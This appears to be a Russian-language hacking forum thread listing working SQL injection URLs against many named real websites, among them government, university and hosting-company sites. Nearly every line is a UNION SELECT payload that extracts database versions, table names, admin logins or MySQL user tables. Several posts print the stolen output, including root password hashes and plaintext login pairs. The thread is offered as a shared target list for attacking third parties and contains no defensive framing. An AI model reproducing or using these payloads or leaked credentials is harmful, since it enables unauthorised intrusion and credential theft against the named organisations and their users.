Это означает что вывод нужен в кодировке latin1 Code: convert(concat_ws(0x3b,version(),user(),database()) using latin1)
http://www.autosave-scotland.co.uk/%20shop/choose_model.php?manID=' www.qmul.ac.uk/courses/department.php?dept_id=' www.wilkinson-sword.co.uk/index.php?id='
http://tutvsesvoi.ru/index.php?do=info&iID=-10+union+select+1,concat_ws(0x203a20,aID,aName,aPass,aEmail),3,4,5,6+from+tutvsesv_tvs.tvs_auth+limit+0,1/*
Code: http://ts.[B]motronline.com[/B]/login.php?detail='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x203a20,admin_id,admin_pass),14,15,16,17,18,19,20,21,22,23+from+gllcts2_admin+limit+0,50/* http://www.bridgewater.edu/index.php?id=-857+union+select+1,2,3,4,5,6,7,aes_decrypt(aes_encrypt(concat_ws(0x3a,id,username,password),31337),31337),9,10,11,12,13,14,15,16,17,18,19,20+from+users+limit+17,3/*
.gov Code: http://iff.immigration.gov.tw/enfront/lifep.php?tr_id=2&id=-111+UNION+SELECT+1,2,3,concat_ws(0x3a,user,password),5+from+mysql.user/* MySQL root:admin Code: http://www.colerainebc.gov.uk/show.php?id=-1111+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user,password),6,7,8,9,10,11+from+mysql.user/* root:47bccb536d8ad7ee
Code: http://fuckthedrugs.net/groups/stream.php?memo_id=12+UNION+SELECT+1,username,3,4,password,6,7,8+FROM+mysql.users/* root:58ac58431c5a1a5e
http://www.happyland-drink.ru/brands.php?id=-2+union+select+1,concat(id,char(58),password,char(58),user,char(58),email,char(58),phone),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+partners+limit+321,1/* http://www.westlinegroup.ru/index.php?id=-182+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,12,13/* http://www.mediasoyuz.ru/news/index.php?id=-712+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,12/* http://www.moiki.net/articles.php?id=-16+union+select+VERSION(),2/* http://bannerinter.com/index.php?id=2+union+select+1,2,table_name,4+from+INFORMATION_SCHEMA.TABLES/* http://www.ukrprint.com/job/show_message.php?id=-1820+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* http://www.hosser.ru/index204.php?id=-379+UNION+SELECT+1,2,3,4,VERSION(),6,7,8,9+from+clients/* http://www.pr.kg/or/detail.php?id=-231+UNION+SELECT+1,2,3,4,5,concat(id,0x3a,name,0x3a,pass,0x3a,email),7,8+from+users/*
Code: http://photoshopia.ru/forum/arcade.php?gsearch='+union+select+1,2,3,4,concat(user(),char(58),password,char(58),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+users/* вывод внизу.
http://www.algoritmia.net/articles.php?id=-31+union+select+1,concat(password,CHAR(32,62,62,32),email),3,4,5,6+from+users+limit+0,5000/*
.gov Code: http://www.maineservicecommission.gov/news/release.php?ID=-252+union+select+1,2,version(),database(),user(),6,7,8,9,10,11,12/* .edu Code: http://www.wishard.edu/news/release.php?id=-38+union+select+1,version(),database(),4,user(),6/* .org Code: http://www.camdenme.org/news/release.php?ID=-63+union+select+1,2,3,4,user(),database(),7,8,9,10,11,12,13,14,version()/* http://www.meprcouncil.org/news/release.php?ID=-66+union+select+1,2,user(),version(),database(),6,7,8,9,10,11,12/* .com Code: http://www.simonv.com/music/release.php?id=-78+union+select+concat(user(),version(),database())/* http://www.mainelobsterfestival.com/release.php?ID=-13+union+select+1,2,3,version(),user(),6,database(),8,9,10,11,12/* http://www.peyron.com/release.php?id=-26+union+select+1,2,3,concat(version(),user()),database(),6,7,8/* .net Code: http://www.integralwireless.net/news_media/release.php?id=-13+union+select+1,version(),database(),4,5,user(),7,8,9/* Вкусненькое: http://www.daltonagency.com/ Code: http://www.daltonagency.com/release.php?id=-51+union+select+1,user,password,4,5,6,7+from+mysql.user/* User: root Password:51f2005954eb9d3e http://www.playavista.com/ Code: http://www.playavista.com/about/news/release.php?id=-18+union+select+1,2,3,4,5,6,convert(concat_ws(0x3b,password,user,database())using%20latin1),8+from+mysql.user/* User: root Password:*ECA88AB9EB85925FD22E637244E4E57A7C906C0A
4й мускул, таблицы подобрать не смог _http://www.uprava.org/section.php?id=-19+union+select+1,2,3,4,5,6,7/*&sub_id=126 _http://www.trimm.ru/php/content.php?group=2&id=-3869+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/* зы антибоян Константина не пашет, так что за повторы не ручаюсь.
Code: http://www.tehv.at/page/check.php?id=-62+union+select+1,2,password,4,5+from+user/* Code: http://www.accilifeskills.com/life-skills-curriculum/bad-check.php?id=-7+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12/* несколько минут в гугле =\
http://www.inforos.ru ------------------------------------------------------ SQL инъекция: Code: http://www.inforos.ru/?id=111111111111+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4,5,6,7,8,9,10/* Code: http://www.inforos.ru/?idraz=111111111+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7/* Code: http://www.inforos.ru/?idt=1111111111+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7/* Code: http://www.inforos.ru/firm/?parent=111111111+union+select+1,2,concat(database(),char(58),user(),char(58),version())/* Code: http://www.inforos.ru/?idp=1111111+union+select+concat(database(),char(58),user(),char(58),version())/* inforosnet:inforosnet@localhost:5.0.41-log ------------------------------------------------------ Таблицы: Code: http://www.inforos.ru/?id=111111111111+union+select+table_name,2,3,4,5,6,7,8,9,10+from+information_schema.tables+limit+26,1/* Code: conf_table_2005 inforos_about inforos_about_photo inforos_about_price inforos_contact_person inforos_document inforos_enfirm inforos_ensalebanner inforos_firm inforos_firm_to_rubrika inforos_main inforos_main_old inforos_manager inforos_myfirm inforos_personali inforos_region inforos_region_firm inforos_region_firm_old inforos_reklama inforos_reklama_t inforos_rublika inforos_rubrik_firm inforos_rubrik_firm_t inforos_salebanner inforos_salebannertype inforos_schet inforos_search_fon inforos_shablon inforos_subscribe inforos_subscribe_ inforos_themas inforos_tmain inforos_top_banner inforos_translate inforos_type inforos_type_firm inforos_user_reklama inforos_user_reklama_t otvet_admin_2005 ------------------------------------------------------ inforos_manager: Code: http://www.inforos.ru/?id=111111111111+union+select+concat(id_manager,char(58),fio_manager,char(58),phones_manager,char(58),files_manager,char(58),firms_manager,char(58),login,char(58),pass,char(58),trec),2,3,4,5,6,7,8,9,10+from+inforos_manager+limit+0,1/* Code: http://www.inforos.ru/?id=111111111111+union+select+concat(login,char(58),pass),2,3,4,5,6,7,8,9,10+from+inforos_manager+limit+0,1/* shurik:shurik wer:wer
Code: http://www.euro-honey.com/shop/product_info.php?products_id=166+limit+0+UNION+SELECT+null,concat(user(),0x3a,version())/* нашел только таблицу admin, да и то, поля не мог найти
Code: http://www.uzgeolcom.uz/structure.php?lng=rus&id=-8+union+select+1,2,3,concat(login,0x3a,passw),5+from+users/*&oper=lst Larisa:f5adec1d9b21223c5c0ca9ca49414d56 Государственный Комитет по Геологии и Минеральным Ресурсам Р Уз
Code: http://ipodmania.ru/index.php?state=catalogs&activeCategory=184+union+select+1,concat(login,0x3a,password)+from+user/* угук вывода нет ( н: Code: http://hspbru.majordomo.ru/?do=structure&pid=1&id=-1+union+select+version(),user()/* Code: http://hosting.rbc.ru/ru/support/cron/?id35=-1'+union+select+1,2,3,4,5,6,7,8,convert(concat_ws(0x3b,user(),database(),version())+using+cp1251),10,11/* Code: http://ru-hosting.ru/news.php?hnews_id=-1+union+select+1,2,concat(0x3d,user(),version(),name,pass),4,5+from+users/* Code: http://sevinfo3.valuehost.ru/cbs/showalmanah.php?almanac_code=-1+union+select+1,concat(0x3a,user(),version(),database()),3,4,5,6/*
